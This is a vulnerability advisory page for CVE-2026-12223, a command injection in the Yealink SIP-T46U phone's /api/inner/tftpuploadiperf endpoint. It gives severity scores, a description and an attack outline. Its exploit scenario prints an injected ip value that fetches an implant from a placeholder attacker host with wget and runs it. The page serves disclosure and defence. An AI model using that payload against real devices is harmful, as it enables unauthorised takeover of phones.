Skip to main content

Yealink SIP-T46U CVE-2026-12223

| EUVD-2026-36696 LOW
Command Injection (CWE-77)
2026-06-15 VulDB GHSA-pcph-rxv7-4pvp
Command Injection Sip T46U
2.0
CVSS 4.0 · Vendor: VulDB

Severity by source

Vendor (VulDB) PRIMARY
2.0 MEDIUM
CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.5 MEDIUM

Adjacent-network attack requiring low-privilege authentication; no scope change beyond the constrained embedded device; limited C/I/A impact consistent with command injection on a VoIP phone.

3.1 AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
4.0 AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

Primary rating from Vendor (VulDB).

CVSS VectorVendor: VulDB

CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Adjacent
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

3
Severity Changed
Jun 15, 2026 - 06:22 NVD
MEDIUM LOW
CVSS changed
Jun 15, 2026 - 06:22 NVD
5.1 (MEDIUM) 2.0 (LOW)
Analysis Generated
Jun 15, 2026 - 06:21 vuln.today

DescriptionCVE.org

A vulnerability was identified in Yealink SIP-T46U 108.86.0.118. Affected by this vulnerability is the function mod_webd.TFTPUploadIperf of the file /api/inner/tftpuploadiperf of the component Web FastCGI Service. The manipulation of the argument ip/port leads to command injection. The attack needs to be initiated within the local network. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.

AnalysisAI

Command injection in the Yealink SIP-T46U IP phone firmware 108.86.0.118 enables authenticated, adjacent-network attackers to execute arbitrary operating system commands by manipulating the ip or port arguments submitted to the /api/inner/tftpuploadiperf Web FastCGI endpoint. Publicly available exploit code exists, and Yealink did not respond to responsible disclosure, meaning no vendor-released patch has been identified at time of analysis. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Gain LAN or VLAN adjacency to target SIP-T46U
Delivery
Authenticate to Web FastCGI management API with low-privilege credentials
Exploit
Submit crafted HTTP POST to /api/inner/tftpuploadiperf
Execution
Inject shell metacharacters into ip or port parameter
Persist
Trigger unsanitized system command execution
Impact
Execute arbitrary OS commands on phone firmware
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires two concrete prerequisites: first, adjacent-network reachability - the attacker must be on the same LAN or VLAN segment as the target SIP-T46U phone's Web FastCGI Service, which explicitly rules out direct internet exploitation unless the management interface is non-standardly exposed externally; second, low-privilege authentication - the CVSS 4.0 PR:L metric confirms that valid credentials to the phone's web API are necessary, meaning unauthenticated exploitation is not supported by available data. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 vector (AV:A/AC:L/AT:N/PR:L/UI:N with VC:L/VI:L/VA:L) yields a moderate score of 5.1, constrained principally by the adjacent-network attack vector and the low-privilege authentication requirement - two factors that substantially narrow the exploitable population relative to internet-facing, unauthenticated vulnerabilities. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with low-privileged credentials to the Yealink SIP-T46U management interface - obtained via default credentials or internal credential reuse - sends a crafted HTTP POST to `/api/inner/tftpuploadiperf` with the `ip` parameter containing a value such as `127.0.0.1; wget http://attacker.lan/implant -O /tmp/i && chmod +x /tmp/i && /tmp/i`. The `mod_webd.TFTPUploadIperf` function passes this value unsanitized to an underlying shell command, executing the injected payload as the web service process on the phone. …
Remediation No vendor-released patch has been identified at time of analysis, as Yealink did not respond to responsible disclosure. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-12218 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.87.50.1) allows adjacent-network attackers wi
CVE-2026-12220 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.86.0.118) allows adjacent-network attackers w
CVE-2026-12221 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.86.0.118) allows adjacent-network attackers w
CVE-2026-12222 HIGH POC
7.3 Jun 15

Stack-based buffer overflow in the Yealink SIP-T46U IP phone (firmware 108.86.0.118) allows authenticated adjacent-netwo
CVE-2026-12219 LOW POC
2.1 Jun 15

Command injection in Yealink SIP-T46U firmware 108.86.0.118 enables remote authenticated attackers to execute arbitrary

Share

CVE-2026-12223 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy